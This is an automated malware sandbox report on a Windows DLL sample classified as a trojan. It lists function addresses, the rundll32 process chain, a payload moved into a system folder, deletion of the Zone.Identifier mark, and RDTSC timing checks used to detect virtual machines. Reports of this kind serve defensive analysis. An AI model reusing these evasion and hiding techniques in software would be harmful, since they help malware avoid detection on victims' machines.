Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F97ED1	9_2_00F97ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA08D1	9_2_00FA08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9CCD4	9_2_00F9CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9BEC9	9_2_00F9BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F990BA	9_2_00F990BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F998BD	9_2_00F998BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F85AB2	9_2_00F85AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F944AA	9_2_00F944AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8DAAE	9_2_00F8DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8FEA0	9_2_00F8FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F978A5	9_2_00F978A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9D6A7	9_2_00F9D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9AC9B	9_2_00F9AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9D091	9_2_00F9D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F83C91	9_2_00F83C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8AC95	9_2_00F8AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F94E8A	9_2_00F94E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9748A	9_2_00F9748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8CC8D	9_2_00F8CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F87283	9_2_00F87283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA0687	9_2_00FA0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F81C76	9_2_00F81C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9406E	9_2_00F9406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F82654	9_2_00F82654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F89A57	9_2_00F89A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8A048	9_2_00F8A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9E441	9_2_00F9E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F82043	9_2_00F82043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F83845	9_2_00F83845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F82A46	9_2_00F82A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9F83F	9_2_00F9F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA1A3C	9_2_00FA1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F95220	9_2_00F95220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F89E22	9_2_00F89E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8D223	9_2_00F8D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8EC27	9_2_00F8EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8E21C	9_2_00F8E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8F41F	9_2_00F8F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F91C10	9_2_00F91C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F88C09	9_2_00F88C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F81A0A	9_2_00F81A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8220A	9_2_00F8220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F84C00	9_2_00F84C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8C5FE	9_2_00F8C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA03F1	9_2_00FA03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F855E8	9_2_00F855E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9BFE8	9_2_00F9BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8A3DF	9_2_00F8A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA25C3	9_2_00FA25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F86FC4	9_2_00F86FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F97BB2	9_2_00F97BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9B1B5	9_2_00F9B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8BFB6	9_2_00F8BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F94BAA	9_2_00F94BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F99DA1	9_2_00F99DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F92FA2	9_2_00F92FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9D99A	9_2_00F9D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8FD91	9_2_00F8FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA1193	9_2_00FA1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9B397	9_2_00F9B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F94D8D	9_2_00F94D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F84F8E	9_2_00F84F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8758F	9_2_00F8758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F89384	9_2_00F89384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9577E	9_2_00F9577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F91F6B	9_2_00F91F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9056A	9_2_00F9056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8C158	9_2_00F8C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F83F5C	9_2_00F83F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9F14D	9_2_00F9F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA1343	9_2_00FA1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F83345	9_2_00F83345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA0B34	9_2_00FA0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00FA292B	9_2_00FA292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F85923	9_2_00F85923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F86B25	9_2_00F86B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F8251C	9_2_00F8251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9FD10	9_2_00F9FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F82309	9_2_00F82309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F83502	9_2_00F83502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F0B34	14_2_031F0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E577E	14_2_031E577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D758F	14_2_031D758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D9384	14_2_031D9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E4BAA	14_2_031E4BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E2FA2	14_2_031E2FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DC5FE	14_2_031DC5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D55E8	14_2_031D55E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D441E	14_2_031D441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D220A	14_2_031D220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EF83F	14_2_031EF83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DEC27	14_2_031DEC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E5220	14_2_031E5220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D3845	14_2_031D3845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D2043	14_2_031D2043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DAC95	14_2_031DAC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E748A	14_2_031E748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D5AB2	14_2_031D5AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E44AA	14_2_031E44AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E78A5	14_2_031E78A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F08D1	14_2_031F08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E7ED1	14_2_031E7ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EDEF4	14_2_031EDEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D30F6	14_2_031D30F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EECE3	14_2_031EECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D251C	14_2_031D251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EFD10	14_2_031EFD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D2309	14_2_031D2309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D3502	14_2_031D3502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F292B	14_2_031F292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D6B25	14_2_031D6B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D5923	14_2_031D5923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D3F5C	14_2_031D3F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DC158	14_2_031DC158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EF14D	14_2_031EF14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D3345	14_2_031D3345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F1343	14_2_031F1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E056A	14_2_031E056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E1F6B	14_2_031E1F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031ED99A	14_2_031ED99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EB397	14_2_031EB397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DFD91	14_2_031DFD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F1193	14_2_031F1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E4D8D	14_2_031E4D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D4F8E	14_2_031D4F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EB1B5	14_2_031EB1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DBFB6	14_2_031DBFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E7BB2	14_2_031E7BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E43B3	14_2_031E43B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E9DA1	14_2_031E9DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DA3DF	14_2_031DA3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D6FC4	14_2_031D6FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F25C3	14_2_031F25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F03F1	14_2_031F03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EBFE8	14_2_031EBFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DE21C	14_2_031DE21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DF41F	14_2_031DF41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E1C10	14_2_031E1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D8C09	14_2_031D8C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D1A0A	14_2_031D1A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D4C00	14_2_031D4C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F1A3C	14_2_031F1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DD223	14_2_031DD223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D9E22	14_2_031D9E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D2654	14_2_031D2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D9A57	14_2_031D9A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DA048	14_2_031DA048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D2A46	14_2_031D2A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EE441	14_2_031EE441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D1C76	14_2_031D1C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E406E	14_2_031E406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EAC9B	14_2_031EAC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D3C91	14_2_031D3C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031ED091	14_2_031ED091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DCC8D	14_2_031DCC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E4E8A	14_2_031E4E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031F0687	14_2_031F0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D7283	14_2_031D7283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E98BD	14_2_031E98BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E90BA	14_2_031E90BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DDAAE	14_2_031DDAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031ECAA8	14_2_031ECAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031ED6A7	14_2_031ED6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031DFEA0	14_2_031DFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E0ADE	14_2_031E0ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031ECCD4	14_2_031ECCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EBEC9	14_2_031EBEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EA8F0	14_2_031EA8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EAEEB	14_2_031EAEEB

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E4C5BE0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E4C5BE0 appears 46 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4B13F0 zwxnlwalmcbgmt,		0_2_6E4B13F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4B13F0 zwxnlwalmcbgmt,		2_2_6E4B13F0

Source: dUGnMYeP1C.dll

Binary or memory string: OriginalFilenameErulfuaekg.dll6 vs dUGnMYeP1C.dll

Source: dUGnMYeP1C.dll	Virustotal: Detection: 19%
Source: dUGnMYeP1C.dll	ReversingLabs: Detection: 22%

Source: dUGnMYeP1C.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,abziuleoxsborpb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,aejkroaebsbxdnkhb
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau",grPefdKmoEDD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Syakyqcviop\airusfmukngvit.rau",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,abziuleoxsborpb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,aejkroaebsbxdnkhb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau",grPefdKmoEDD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Syakyqcviop\airusfmukngvit.rau",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@27/0@0/20

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4BBC70 SHGetFolderPathW,CoCreateInstance,

0_2_6E4BBC70

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_031E1B54 CreateToolhelp32Snapshot,

14_2_031E1B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,Control_RunDLL

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4BEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

0_2_6E4BEBD0

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: dUGnMYeP1C.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: dUGnMYeP1C.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: dUGnMYeP1C.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: dUGnMYeP1C.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: dUGnMYeP1C.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: dUGnMYeP1C.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_013E1229 push eax; retf	0_2_013E129A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4C5C26 push ecx; ret	0_2_6E4C5C39
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4E8067 push ecx; ret	0_2_6E4E807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4C5C26 push ecx; ret	2_2_6E4C5C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4E8067 push ecx; ret	2_2_6E4E807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00EE1229 push eax; retf	3_2_00EE129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00911229 push eax; retf	6_2_0091129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F81229 push eax; retf	9_2_00F8129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031D1229 push eax; retf	14_2_031D129A

Source: dUGnMYeP1C.dll

Static PE information: real checksum: 0x81586 should be: 0x82f94

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E4B6672 second address: 000000006E4B66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F75F4AB0AF1h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E4B8A23 second address: 000000006E4B8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F75F4D5ACBEh 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E4B6672 second address: 000000006E4B66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F75F4AB0AF1h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E4B8A23 second address: 000000006E4B8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F75F4D5ACBEh 0x00000007 rdtscp

Source: C:\Windows\System32\svchost.exe TID: 5036

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4B6620 rdtscp

